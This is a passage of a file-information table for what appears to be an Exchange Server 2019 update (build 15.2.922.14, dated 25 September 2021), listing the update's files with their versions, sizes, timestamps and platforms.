\nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,688| 25-Sep-21| 2:11| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,688| 25-Sep-21| 2:12| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,664| 25-Sep-21| 2:15| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,664| 25-Sep-21| 2:15| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:12| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:13| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,664| 25-Sep-21| 2:09| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:11| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.922.14| 13,192| 25-Sep-21| 2:15| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,672| 25-Sep-21| 2:13| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,664| 25-Sep-21| 2:11| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,688| 25-Sep-21| 2:10| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,372| 25-Sep-21| 2:28| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,587| 25-Sep-21| 2:28| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,584| 25-Sep-21| 2:28| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,610| 25-Sep-21| 2:28| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,928| 25-Sep-21| 2:28| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,639| 25-Sep-21| 2:28| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.922.14| 17,784| 25-Sep-21| 2:28| x86 \nEscprint.dll| 15.2.922.14| 20,344| 25-Sep-21| 2:09| x64 \nEse.dll| 15.2.922.14| 3,741,560| 25-Sep-21| 2:15| x64 \nEseback2.dll| 15.2.922.14| 350,096| 25-Sep-21| 2:18| x64 \nEsebcli2.dll| 15.2.922.14| 318,344| 25-Sep-21| 2:13| x64 \nEseperf.dll| 15.2.922.14| 108,920| 25-Sep-21| 2:18| x64 \nEseutil.exe| 15.2.922.14| 425,360| 25-Sep-21| 2:18| x64 \nEsevss.dll| 15.2.922.14| 44,408| 25-Sep-21| 2:18| x64 \nEtweseproviderresources.dll| 15.2.922.14| 101,256| 25-Sep-21| 2:09| x64 \nEventperf.dll| 15.2.922.14| 59,784| 25-Sep-21| 2:09| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,105| 25-Sep-21| 4:44| Not applicable \nExchange.format.ps1xml| Not applicable| 649,686| 25-Sep-21| 4:44| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,331| 25-Sep-21| 4:44| Not applicable \nExchange.ps1| Not applicable| 20,803| 25-Sep-21| 4:44| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,547| 25-Sep-21| 4:36| Not applicable \nExchange.types.ps1xml| Not applicable| 365,141| 25-Sep-21| 4:44| Not applicable \nExchangeudfcommon.dll| 15.2.922.14| 122,744| 25-Sep-21| 2:10| x86 \nExchangeudfs.dll| 15.2.922.14| 272,784| 25-Sep-21| 2:15| x86 \nExchmem.dll| 15.2.922.14| 86,408| 25-Sep-21| 2:09| x64 \nExchsetupmsg.dll| 15.2.922.14| 19,336| 25-Sep-21| 2:09| x64 \nExdbfailureitemapi.dll| Not applicable| 27,008| 25-Sep-21| 2:09| x64 \nExdbmsg.dll| 15.2.922.14| 230,792| 25-Sep-21| 2:15| x64 \nExeventperfplugin.dll| 15.2.922.14| 25,488| 25-Sep-21| 2:12| x64 \nExmime.dll| 15.2.922.14| 364,920| 25-Sep-21| 2:11| x64 \nExportedgeconfig.ps1| Not applicable| 27,415| 25-Sep-21| 2:28| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,570| 25-Sep-21| 2:28| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,218| 25-Sep-21| 2:28| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,410| 25-Sep-21| 2:09| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,137| 25-Sep-21| 2:28| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,056| 25-Sep-21| 2:28| Not applicable \nExppw.dll| 15.2.922.14| 83,336| 25-Sep-21| 2:12| x64 \nExprfdll.dll| 15.2.922.14| 26,488| 25-Sep-21| 2:12| x64 \nExrpc32.dll| 15.2.922.14| 2,029,448| 25-Sep-21| 2:27| x64 \nExrw.dll| 15.2.922.14| 28,040| 25-Sep-21| 2:09| x64 \nExsetdata.dll| 15.2.922.14| 2,779,024| 25-Sep-21| 2:28| x64 \nExsetup.exe| 15.2.922.14| 35,192| 25-Sep-21| 4:37| x86 \nExsetupui.exe| 15.2.922.14| 471,952| 25-Sep-21| 4:38| x86 \nExtrace.dll| 15.2.922.14| 245,112| 25-Sep-21| 2:09| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.922.14| 601,480| 25-Sep-21| 2:40| x86 \nExwatson.dll| 15.2.922.14| 44,920| 25-Sep-21| 2:11| x64 \nFastioext.dll| 15.2.922.14| 60,296| 25-Sep-21| 2:12| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 25-Sep-21| 6:11| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,228| 25-Sep-21| 6:11| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,760| 25-Sep-21| 6:11| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 25-Sep-21| 6:11| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 25-Sep-21| 6:10| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,759| 25-Sep-21| 6:11| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 25-Sep-21| 6:11| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 25-Sep-21| 6:11| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 25-Sep-21| 6:10| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 25-Sep-21| 6:11| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 25-Sep-21| 6:11| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,754| 25-Sep-21| 6:11| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 25-Sep-21| 6:10| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 25-Sep-21| 6:10| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 25-Sep-21| 6:10| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,730| 25-Sep-21| 6:11| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,760| 25-Sep-21| 6:11| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 25-Sep-21| 6:10| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 25-Sep-21| 6:11| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 25-Sep-21| 6:10| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 25-Sep-21| 6:11| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,757| 25-Sep-21| 6:11| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 25-Sep-21| 6:11| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 25-Sep-21| 6:10| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 25-Sep-21| 6:11| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,777| 25-Sep-21| 6:11| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 25-Sep-21| 6:11| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 25-Sep-21| 6:10| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 25-Sep-21| 6:11| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 25-Sep-21| 6:10| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,243| 25-Sep-21| 2:28| Not applicable \nFilteringpowershell.dll| 15.2.922.14| 223,096| 25-Sep-21| 2:28| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,664| 25-Sep-21| 2:28| Not applicable \nFiltermodule.dll| 15.2.922.14| 180,112| 25-Sep-21| 2:12| x64 \nFipexeuperfctrresource.dll| 15.2.922.14| 15,240| 25-Sep-21| 2:11| x64 \nFipexeventsresource.dll| 15.2.922.14| 44,936| 25-Sep-21| 2:11| x64 \nFipexperfctrresource.dll| 15.2.922.14| 32,632| 25-Sep-21| 2:12| x64 \nFirewallres.dll| 15.2.922.14| 72,568| 25-Sep-21| 2:09| x64 \nFms.exe| 15.2.922.14| 1,350,016| 25-Sep-21| 2:33| x64 \nForefrontactivedirectoryconnector.exe| 15.2.922.14| 110,984| 25-Sep-21| 2:10| x64 \nFpsdiag.exe| 15.2.922.14| 18,824| 25-Sep-21| 2:12| x86 \nFsccachedfilemanagedlocal.dll| 15.2.922.14| 822,152| 25-Sep-21| 2:18| x64 \nFscconfigsupport.dll| 15.2.922.14| 56,720| 25-Sep-21| 2:09| x86 \nFscconfigurationserver.exe| 15.2.922.14| 430,992| 25-Sep-21| 2:11| x64 \nFscconfigurationserverinterfaces.dll| 15.2.922.14| 15,760| 25-Sep-21| 2:15| x86 \nFsccrypto.dll| 15.2.922.14| 208,760| 25-Sep-21| 2:09| x64 \nFscipcinterfaceslocal.dll| 15.2.922.14| 28,544| 25-Sep-21| 2:09| x86 \nFscipclocal.dll| 15.2.922.14| 38,288| 25-Sep-21| 2:18| x86 \nFscsqmuploader.exe| 15.2.922.14| 453,512| 25-Sep-21| 2:18| x64 \nGetucpool.ps1| Not applicable| 19,783| 25-Sep-21| 2:28| Not applicable \nGetvalidengines.ps1| Not applicable| 13,298| 25-Sep-21| 2:18| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,805| 25-Sep-21| 2:09| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,651| 25-Sep-21| 2:09| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,719| 25-Sep-21| 2:09| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,771| 25-Sep-21| 2:09| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,494| 25-Sep-21| 2:09| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,701| 25-Sep-21| 2:09| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,806| 25-Sep-21| 2:09| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,348| 25-Sep-21| 2:28| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,959| 25-Sep-21| 2:28| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,058| 25-Sep-21| 2:28| Not applicable \nGet_storetrace.ps1| Not applicable| 51,883| 25-Sep-21| 2:27| Not applicable \nHuffman_xpress.dll| 15.2.922.14| 32,648| 25-Sep-21| 2:11| x64 \nImportedgeconfig.ps1| Not applicable| 77,272| 25-Sep-21| 2:28| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,488| 25-Sep-21| 2:28| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,830| 25-Sep-21| 2:28| Not applicable \nInproxy.dll| 15.2.922.14| 85,880| 25-Sep-21| 2:15| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,535| 25-Sep-21| 2:09| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,925| 25-Sep-21| 2:09| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,991| 25-Sep-21| 5:05| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.922.14| 107,384| 25-Sep-21| 2:09| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.922.14| 20,352| 25-Sep-21| 2:09| Not applicable \nInterop.certenroll.dll| 15.2.922.14| 142,728| 25-Sep-21| 2:09| x86 \nInterop.licenseinfointerface.dll| 15.2.922.14| 14,200| 25-Sep-21| 2:18| x86 \nInterop.netfw.dll| 15.2.922.14| 34,184| 25-Sep-21| 2:09| x86 \nInterop.plalibrary.dll| 15.2.922.14| 72,592| 25-Sep-21| 2:09| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.922.14| 27,016| 25-Sep-21| 2:09| Not applicable \nInterop.taskscheduler.dll| 15.2.922.14| 46,480| 25-Sep-21| 2:09| x86 \nInterop.wuapilib.dll| 15.2.922.14| 60,792| 25-Sep-21| 2:11| x86 \nInterop.xenroll.dll| 15.2.922.14| 39,808| 25-Sep-21| 2:09| x86 \nKerbauth.dll| 15.2.922.14| 62,856| 25-Sep-21| 2:10| x64 \nLicenseinfointerface.dll| 15.2.922.14| 643,472| 25-Sep-21| 2:15| x64 \nLpversioning.xml| Not applicable| 20,418| 25-Sep-21| 4:37| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,936| 25-Sep-21| 2:27| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.922.14| 138,616| 25-Sep-21| 2:09| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,269| 25-Sep-21| 2:28| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,336| 25-Sep-21| 2:27| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,099| 25-Sep-21| 2:28| Not applicable \nMce.dll| 15.2.922.14| 1,693,056| 25-Sep-21| 2:12| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,483| 25-Sep-21| 2:28| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,611| 25-Sep-21| 2:28| Not applicable \nMicrosoft.database.isam.dll| 15.2.922.14| 127,864| 25-Sep-21| 2:28| x86 \nMicrosoft.dkm.proxy.dll| 15.2.922.14| 26,000| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.922.14| 68,488| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.922.14| 17,808| 25-Sep-21| 2:15| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.922.14| 233,360| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.922.14| 15,752| 25-Sep-21| 2:13| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.922.14| 43,400| 25-Sep-21| 2:15| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.922.14| 1,776,000| 25-Sep-21| 4:09| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.922.14| 505,232| 25-Sep-21| 4:59| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.922.14| 76,152| 25-Sep-21| 5:01| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.922.14| 135,568| 25-Sep-21| 3:45| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.922.14| 23,440| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.922.14| 15,760| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.922.14| 27,016| 25-Sep-21| 3:55| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.922.14| 53,624| 25-Sep-21| 3:52| x86 \nMicrosoft.exchange.assistants.dll| 15.2.922.14| 925,048| 25-Sep-21| 3:48| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.922.14| 26,000| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.922.14| 43,384| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.922.14| 15,240| 25-Sep-21| 4:36| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.922.14| 14,720| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.922.14| 70,544| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.922.14| 94,600| 25-Sep-21| 4:42| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.922.14| 13,192| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.922.14| 15,752| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.922.14| 36,752| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.922.14| 15,760| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.922.14| 79,752| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.922.14| 396,168| 25-Sep-21| 4:12| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.922.14| 21,384| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.922.14| 57,224| 25-Sep-21| 4:13| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.922.14| 14,728| 25-Sep-21| 3:57| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.922.14| 35,704| 25-Sep-21| 4:00| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.922.14| 276,368| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.922.14| 16,264| 25-Sep-21| 2:13| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.922.14| 25,992| 25-Sep-21| 4:32| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.922.14| 13,688| 25-Sep-21| 2:15| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.922.14| 23,440| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.922.14| 378,256| 25-Sep-21| 3:51| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.922.14| 83,848| 25-Sep-21| 2:13| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.922.14| 2,971,016| 25-Sep-21| 5:03| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.922.14| 5,029,768| 25-Sep-21| 4:59| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.922.14| 893,840| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.922.14| 413,584| 25-Sep-21| 4:41| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.922.14| 924,552| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.922.14| 31,616| 25-Sep-21| 3:56| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.922.14| 52,088| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.922.14| 21,896| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.922.14| 33,672| 25-Sep-21| 3:57| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.922.14| 3,563,896| 25-Sep-21| 3:54| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.922.14| 108,424| 25-Sep-21| 2:28| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.922.14| 288,656| 25-Sep-21| 3:56| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.922.14| 627,584| 25-Sep-21| 3:37| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.922.14| 86,400| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.922.14| 1,830,288| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.922.14| 31,624| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.922.14| 466,320| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.922.14| 26,000| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.922.14| 38,280| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.922.14| 102,792| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.922.14| 48,520| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.922.14| 67,456| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.common.dll| 15.2.922.14| 172,936| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.922.14| 113,544| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.il.dll| 15.2.922.14| 13,696| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.922.14| 130,448| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.922.14| 63,880| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.922.14| 19,832| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.922.14| 15,248| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.common.search.dll| 15.2.922.14| 108,936| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.922.14| 17,784| 25-Sep-21| 2:10| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.922.14| 51,600| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.922.14| 36,752| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.922.14| 27,520| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.922.14| 1,042,312| 25-Sep-21| 2:40| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.922.14| 29,064| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.922.14| 13,192| 25-Sep-21| 2:15| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.922.14| 181,136| 25-Sep-21| 4:44| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.922.14| 30,072| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.922.14| 22,392| 25-Sep-21| 3:15| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.922.14| 85,880| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.compliance.dll| 15.2.922.14| 51,088| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.922.14| 37,248| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.922.14| 50,568| 25-Sep-21| 3:57| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.922.14| 33,168| 25-Sep-21| 3:50| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.922.14| 1,100,664| 25-Sep-21| 3:47| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.922.14| 206,736| 25-Sep-21| 3:50| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.922.14| 210,824| 25-Sep-21| 4:16| x86 \nMicrosoft.exchange.compression.dll| 15.2.922.14| 17,280| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.922.14| 37,752| 25-Sep-21| 3:42| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.922.14| 14,224| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.922.14| 145,808| 25-Sep-21| 3:36| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.922.14| 14,200| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.922.14| 53,112| 25-Sep-21| 3:41| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.922.14| 15,736| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.922.14| 23,416| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.922.14| 13,192| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.922.14| 54,648| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.922.14| 13,688| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.922.14| 1,846,136| 25-Sep-21| 3:43| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.922.14| 30,088| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.922.14| 68,472| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.922.14| 15,248| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.922.14| 21,392| 25-Sep-21| 3:36| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.922.14| 13,200| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.922.14| 25,992| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.922.14| 169,864| 25-Sep-21| 2:40| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.922.14| 330,104| 25-Sep-21| 2:40| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.922.14| 173,968| 25-Sep-21| 2:40| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.922.14| 71,048| 25-Sep-21| 2:40| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.922.14| 203,640| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.context.client.dll| 15.2.922.14| 27,024| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.922.14| 51,592| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.context.core.dll| 15.2.922.14| 51,080| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.922.14| 46,968| 25-Sep-21| 2:53| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.922.14| 1,093,520| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.922.14| 57,224| 25-Sep-21| 2:18| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.922.14| 326,536| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.922.14| 3,357,584| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.922.14| 35,728| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.922.14| 17,800| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.922.14| 165,240| 25-Sep-21| 3:16| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.922.14| 619,384| 